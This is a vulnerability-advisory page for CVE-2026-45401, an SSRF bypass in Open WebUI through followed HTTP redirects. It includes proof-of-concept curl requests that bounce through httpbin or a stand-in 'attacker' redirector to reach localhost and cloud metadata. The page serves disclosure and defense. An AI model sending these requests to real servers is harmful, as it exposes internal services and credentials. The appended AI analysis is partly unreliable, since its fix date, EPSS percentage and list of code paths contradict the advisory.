Skip to main content

Open WebUI CVE-2026-45401

| EUVDEUVD-2026-30631 HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-14 https://github.com/open-webui/open-webui GHSA-rh5x-h6pp-cjj6
8.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.5 HIGH
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 14, 2026 - 21:51 vuln.today
Analysis Generated
May 14, 2026 - 21:51 vuln.today
CVE Published
May 14, 2026 - 20:27 nvd
HIGH 8.5

DescriptionGitHub Advisory

Server-Side Request Forgery (SSRF) Bypass via HTTP Redirect Following in Web-Fetch, Image-Load, and Chat-Completion Endpoints

Summary

The validate_url() function in backend/open_webui/retrieval/web/utils.py only validates the *initial* URL submitted by the caller. The HTTP clients used downstream (sync requests, async aiohttp, langchain's WebBaseLoader) follow HTTP 3xx redirects by default and do not re-validate the redirect target against the private-IP / metadata-IP block list. Any authenticated user can therefore submit a public URL that 302-redirects to an internal address (e.g. 127.0.0.1, 169.254.169.254, RFC1918) and read the internal response body via the /api/v1/retrieval/process/web endpoint, the /api/v1/images/... endpoints, the /api/chat/completions endpoint with an image_url content part, and any other route that calls these helpers.

Affected code paths

The bypass exists across multiple call sites; each independently follows redirects without re-validation.

Path 1 - sync _scrape via SafeWebBaseLoader

backend/open_webui/retrieval/web/utils.py - SafeWebBaseLoader inherits from langchain_community.document_loaders.WebBaseLoader. The parent's _scrape() calls self.session.get(url, self.requests_kwargs). requests_kwargs only sets timeout; allow_redirects=False is not** passed, so requests.Session.get() follows redirects with the default allow_redirects=True. validate_url() is invoked once on the original URL only.

Path 2 - async _fetch (aiohttp)

backend/open_webui/retrieval/web/utils.py - _fetch() previously inherited the aiohttp default allow_redirects=True. As of HEAD this path is fixed (allow_redirects=False). Listed for completeness.

Path 3 - get_content_from_url (sync requests.get)

backend/open_webui/retrieval/utils.py - response = requests.get(url, stream=True, timeout=30). No allow_redirects=False. Reached via /api/v1/retrieval/process/web (file ingestion) and other routers that resolve external URLs.

Path 4 - load_url_image (image edit)

backend/open_webui/routers/images.py - image-URL fetching helper used by the image-edit endpoint. Same pattern: validate_url() checks only the initial URL, the underlying HTTP client follows redirects without re-validation. Reachable via /api/v1/images/edit.

Path 5 - get_image_base64_from_url (chat-completion image inlining)

backend/open_webui/utils/files.py - get_image_base64_from_url() is invoked from convert_url_images_to_base64() in backend/open_webui/utils/middleware.py on every /api/chat/completions request whose message content includes an image_url part. The shared aiohttp session pool (backend/open_webui/utils/session_pool.py) does not override the aiohttp default allow_redirects=True, and the call site itself does not pass allow_redirects=False. This is the most reachable variant in the cluster: no special endpoint, no admin permission, no feature flag - any authenticated user can trigger it from a normal chat message.

Proof of concept

Authenticated low-privilege user; default config, no admin or special permissions required.

bash
curl -X POST https://<target>/api/v1/retrieval/process/web \
  -H "Authorization: Bearer <any_user_token>" \
  -H "Content-Type: application/json" \
  -d '{"url": "https://httpbin.org/redirect-to?url=http%3A%2F%2Flocalhost%3A8080%2Fapi%2Fconfig&status_code=302"}'

Response body contains the internal /api/config payload in file.data.content. Replace the redirect target with http://169.254.169.254/latest/meta-data/ for cloud metadata, or any internal hostname reachable from the server.

For the chat-completion path (Path 5), the same redirect is followed when an image_url content part points to an attacker-controlled redirector:

bash
curl -X POST https://<target>/api/chat/completions \
  -H "Authorization: Bearer <any_user_token>" \
  -H "Content-Type: application/json" \
  -d '{"model":"any","messages":[{"role":"user","content":[{"type":"text","text":"x"},{"type":"image_url","image_url":{"url":"http://attacker/redirect-to-imdsv1"}}]}]}'

Impact

Any authenticated user can read GET responses from any HTTP service reachable by the Open WebUI server process - cloud metadata services (IMDSv1 if available), localhost-bound application APIs, internal databases / monitoring / Kubernetes services, and VPN-bridged on-premise networks.

Recommended fix

For every call site that follows redirects, set allow_redirects=False on the underlying HTTP client and add a per-hop validation loop using validate_url() on each Location: header.

Credits

Per the consolidation rule in SECURITY.md, credit goes only to reporters who FIRST identified a distinct sub-path that no earlier filing covered.

  • tenbbughunters - first to identify SafeWebBaseLoader sync _scrape (Path 1)
  • YLChen-007 - first to identify load_url_image (Path 4)
  • tempcollab - first to identify aiohttp _fetch (Path 2)
  • sneaXOR - first to identify get_content_from_url (Path 3)
  • nayakchinmohan - first to identify get_image_base64_from_url in chat-completion middleware (Path 5)

AnalysisAI

Open WebUI versions ≤0.9.4 allow authenticated users to bypass SSRF protections and read internal network resources via HTTP redirect-following. The vulnerability exists in five distinct code paths: web-fetch retrieval, image-loading endpoints, chat-completion image inlining, and OAuth/tool-server execution flows. Any authenticated user can submit a public URL that 302-redirects to internal addresses (127.0.0.1, 169.254.169.254 cloud metadata, RFC1918 private networks) and receive the response body. The vendor confirms active exploitation in the wild was NOT observed, but publicly available exploit code exists (PoC in advisory) and EPSS score of 0.00043 (4.3%) suggests low automated scanning targeting at time of analysis. Fixed in version 0.9.5 released March 2025.

Technical ContextAI

The root cause (CWE-918 SSRF) stems from a time-of-check-to-time-of-use race in URL validation. The validate_url() function in backend/open_webui/retrieval/web/utils.py applies private-IP block lists only to the initial caller-submitted URL. Downstream HTTP clients (requests.Session via langchain's WebBaseLoader, aiohttp, direct requests.get() calls) default to allow_redirects=True and follow HTTP 3xx Location headers without re-invoking validation. The affected package is pip/open-webui (Python), confirmed via CPE pkg:pip/open-webui. Five code paths were independently identified: SafeWebBaseLoader._scrape() (langchain), get_content_from_url() in retrieval/utils.py, load_url_image() in routers/images.py, get_image_base64_from_url() in utils/files.py (triggered via chat-completion middleware), and aiohttp _fetch() (since patched). Each path inherits the same defect: single-hop validation against a multi-hop protocol (HTTP redirects). The fix (v0.9.5) disables redirects entirely via allow_redirects=False across all call sites and introduces a new AIOHTTP_CLIENT_ALLOW_REDIRECTS environment variable for deployment-level control.

RemediationAI

Upgrade to Open WebUI version 0.9.5 or later immediately, available at https://github.com/open-webui/open-webui/releases/tag/v0.9.5. The patch disables HTTP redirects by default across all five affected code paths (requests, aiohttp, langchain loaders) and introduces the AIOHTTP_CLIENT_ALLOW_REDIRECTS environment variable for operators requiring redirect support in controlled scenarios. For environments unable to upgrade immediately, apply these compensating controls with noted trade-offs: (1) Deploy a reverse proxy (nginx, Envoy) with egress URL filtering to block RFC1918, 127.0.0.0/8, 169.254.0.0/16, and ::1 at the network layer before requests leave the application pod - requires maintaining synchronized block lists and breaks legitimate internal integrations. (2) Set network policies in Kubernetes to deny all egress except explicitly allowed external IP ranges - prevents lateral movement but requires auditing all legitimate external dependencies (model APIs, vector DBs). (3) Disable the web-fetch and image-URL features entirely via firewall rules blocking outbound HTTP from the Open WebUI process - breaks web search, URL summarization, and chat image inlining for all users. (4) For AWS/GCP/Azure deployments, enforce IMDSv2 (session-token requirement) to mitigate cloud metadata theft - does not prevent RFC1918 SSRF or localhost attacks. Operators should audit application logs for HTTP 302/301 responses to internal IP ranges as potential exploitation indicators. The vendor advisory also recommends configuring IFRAME_CSP and TERMINAL_PROXY_HEADERS environment variables introduced in v0.9.5 for defense-in-depth against related injection vectors.

CVE-2025-1974 CRITICAL POC
9.8 Mar 25

A critical vulnerability in Kubernetes ingress-nginx controller allows unauthenticated attackers with pod network access

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2025-1098 HIGH POC
8.8 Mar 25

Kubernetes ingress-nginx contains a configuration injection vulnerability via the mirror-target and mirror-host Ingress

CVE-2025-24514 HIGH POC
8.8 Mar 25

A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingres

CVE-2025-1097 HIGH POC
8.8 Mar 25

A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match-c

CVE-2020-8554 MEDIUM POC
6.3 Jan 21

Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.exter

CVE-2025-55190 CRITICAL POC
9.9 Sep 04

Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Rated critical severity (CVSS 9.9), this vulne

CVE-2018-18843 CRITICAL POC
10.0 Dec 04

The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4

CVE-2026-22039 CRITICAL POC
9.9 Jan 27

Kyverno Kubernetes policy engine prior to 1.x has a privilege escalation vulnerability (CVSS 9.9) allowing policy bypass

CVE-2024-42480 CRITICAL POC
9.9 Aug 12

Kamaji is the Hosted Control Plane Manager for Kubernetes. Rated critical severity (CVSS 9.9), this vulnerability is rem

CVE-2023-28110 CRITICAL POC
9.9 Mar 16

Jumpserver is a popular open source bastion host, and Koko is a Jumpserver component that is the Go version of coco, ref

CVE-2026-25996 CRITICAL POC
9.8 Feb 12

String filter bypass in Inspektor Gadget Kubernetes eBPF tooling before fix. Insufficient string escaping enables filter

Share

CVE-2026-45401 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy